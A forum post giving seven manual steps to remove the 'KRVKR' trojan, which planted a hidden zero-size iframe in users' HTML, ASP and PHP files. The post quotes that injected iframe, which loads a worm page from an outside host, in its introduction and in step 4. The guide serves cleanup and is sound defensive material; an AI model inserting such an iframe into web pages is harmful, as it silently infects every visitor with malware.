FRIHOST • FORUMS • SEARCH • FAQ • TOS • BLOGS • COMPETITIONS
You are invited to Log in or Register a free Frihost Account!

7 [SEVEN] Steps to remove KRVKR Virus from Your PC

jmlworld
Since the 2006, a crazy bastard internet womp, called trojan.realor was arround the windows supported PCs. Anyone of you using the web Design programs including FrontPage, DreamWeaver and a bunch of others those support the cross editting (Design/Code), may experienced that a melicious HTML Code was inside all his works... How Painfull was to reveal the secret that all my studio files were hosting this code <iframe src = http : // www . krvkr . com / worm. htm width=0 height=0></iframe>, that when you excute your designed pages will call the website krvkr.com/worm.htm from the internet to download an updated virus to any computer that browses your docs including you intranet and internet.

I was familiar with that KRVKR womp and used to reinstall windows on my computer, once again It used to comeback fromsomewhere unknown, and reside all the codes in my PC.

I tried the heal today, armed with "My Curiousity" skills and some knowledge related to viruse behaviors... With the final defense line being checked, I used my last war tacktics againest trojans and viruses.

Since there was no known anti virus programme with the ability to remove such melicious program, I did the it manually, with the following steps:
1- Started windows in safe mode.
2- Start Menu => running, running tab order. The 'program' System Configuration Utility, canceled nvscv32.exe associated with the process. Caution, delete nvscv32.exe start of the registry.
3- Manually delete all the copies of spoclsv.exe and nvscv32.exe
4- Remove html / asp / php, all pages of documents in the following code To prevent the spread of the code):<iframe src = http : // www . krvkr . com / worm. htm width=0 height=0></iframe>
5- Try to remove the registry from the windows register: start menu-> Run -> regedit -> Enter.[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \] then try to delete the trojan files from there
6- Install good antivirus, such as norton and trendmicro and make it uptodate.
7- Make an overall virus scan on your PC
I was the winner and all the stability and safety of my PC were restored

NB: A virus sister of this one was alarmed on Symantec website in the summer of 2006, you can see the details by following this link: http://www.symantec.com/security_response/writeup.jsp?docid=2006-111714-5923-99&tabid=2

Any suggestions, recommendations an dchanges are welcome... Rolling Eyes

JMLWorld